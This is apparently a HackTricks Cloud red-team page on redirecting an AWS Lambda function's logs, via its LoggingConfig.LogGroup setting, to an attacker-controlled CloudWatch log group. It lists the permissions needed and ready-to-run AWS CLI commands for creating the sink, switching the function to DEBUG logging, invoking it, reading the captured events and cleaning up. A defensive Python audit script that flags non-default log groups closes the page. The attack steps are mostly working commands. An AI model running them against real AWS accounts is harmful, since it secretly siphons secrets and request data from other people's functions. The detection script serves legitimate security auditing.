AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Abuse the advanced logging controls of lambda:UpdateFunctionConfiguration to redirect a function's logs to an attacker-chosen CloudWatch Logs log group. This works without changing the code or the execution role (most Lambda roles already include logs:CreateLogGroup/CreateLogStream/PutLogEvents via AWSLambdaBasicExecutionRole). If the function prints secrets/request bodies or crashes with stack traces, you can collect them from the new log group.
Required permissions
- lambda:UpdateFunctionConfiguration
- lambda:GetFunctionConfiguration
- lambda:InvokeFunction (or rely on existing triggers)
- logs:CreateLogGroup (often not required if the function role has it)
- logs:FilterLogEvents (to read events)
Steps
- Create a sink log group
aws logs create-log-group --log-group-name "/aws/hacktricks/ht-log-sink" --region us-east-1 || true
- Redirect the target function's logs
aws lambda update-function-configuration \
--function-name <TARGET_FN> \
--logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=DEBUG \
--region us-east-1
Wait until LastUpdateStatus becomes Successful:
aws lambda get-function-configuration --function-name <TARGET_FN> \
--query LastUpdateStatus --output text
- Invoke and read from the sink
aws lambda invoke --function-name <TARGET_FN> /tmp/out.json --payload '{"ht":"log"}' --region us-east-1 >/dev/null
sleep 5
aws logs filter-log-events --log-group-name "/aws/hacktricks/ht-log-sink" --limit 50 --region us-east-1 --query 'events[].message' --output text
Impact
- Covertly redirect all application/system logs to a log group you control, bypassing the expectation that logs only land in /aws/lambda/<fn>.
- Exfiltrate sensitive data printed by the function or surfaced in errors.
Cleanup
aws lambda update-function-configuration --function-name <TARGET_FN> \
--logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text,ApplicationLogLevel=INFO \
--region us-east-1 || true
Notes
- Logging controls are part of Lambda's LoggingConfig (LogGroup, LogFormat, ApplicationLogLevel, SystemLogLevel).
- By default, Lambda sends logs to /aws/lambda/<function>, but you can point it to any log group name; Lambda (or the execution role) will create it if allowed.
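A defender-side check for the redirection described on this page, as an added example (not code from HackTricks): it audits output shaped like `aws lambda list-functions --output json` and flags functions whose LoggingConfig.LogGroup is neither the default /aws/lambda/<function> nor on an allowlist. The sample listing, the function names and the allowlist entry /platform/shared/lambda-logs are constructed for illustration.

```python
import json

# Constructed sample, shaped like `aws lambda list-functions --output json`.
SAMPLE = json.loads("""
{"Functions": [
  {"FunctionName": "orders-api",
   "LoggingConfig": {"LogFormat": "Text", "LogGroup": "/aws/lambda/orders-api"}},
  {"FunctionName": "billing-worker",
   "LoggingConfig": {"LogFormat": "JSON", "ApplicationLogLevel": "DEBUG",
                     "SystemLogLevel": "INFO",
                     "LogGroup": "/aws/hacktricks/ht-log-sink"}},
  {"FunctionName": "audit-export",
   "LoggingConfig": {"LogFormat": "JSON", "ApplicationLogLevel": "INFO",
                     "LogGroup": "/platform/shared/lambda-logs"}},
  {"FunctionName": "legacy-cron"}
]}
""")

# Hypothetical allowlist of custom log groups the platform team has approved.
APPROVED = frozenset({"/platform/shared/lambda-logs"})


def audit_log_groups(listing, approved=frozenset()):
    """Return one finding per function logging outside its expected group."""
    findings = []
    for fn in listing.get("Functions", []):
        name = fn["FunctionName"]
        default = f"/aws/lambda/{name}"
        cfg = fn.get("LoggingConfig") or {}
        # A missing LoggingConfig/LogGroup means the default group is in use.
        group = cfg.get("LogGroup", default)
        if group == default or group in approved:
            continue
        findings.append({
            "function": name,
            "log_group": group,
            "expected": default,
            # Verbose levels raise the chance that payloads reach the sink.
            "verbose": cfg.get("ApplicationLogLevel") in ("TRACE", "DEBUG"),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_log_groups(SAMPLE, APPROVED):
        print(finding)
```

Run it periodically against every region's listing; a finding that also has "verbose" set matches the LogGroup plus ApplicationLogLevel=DEBUG change shown in the steps above.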
HackTricks Cloud

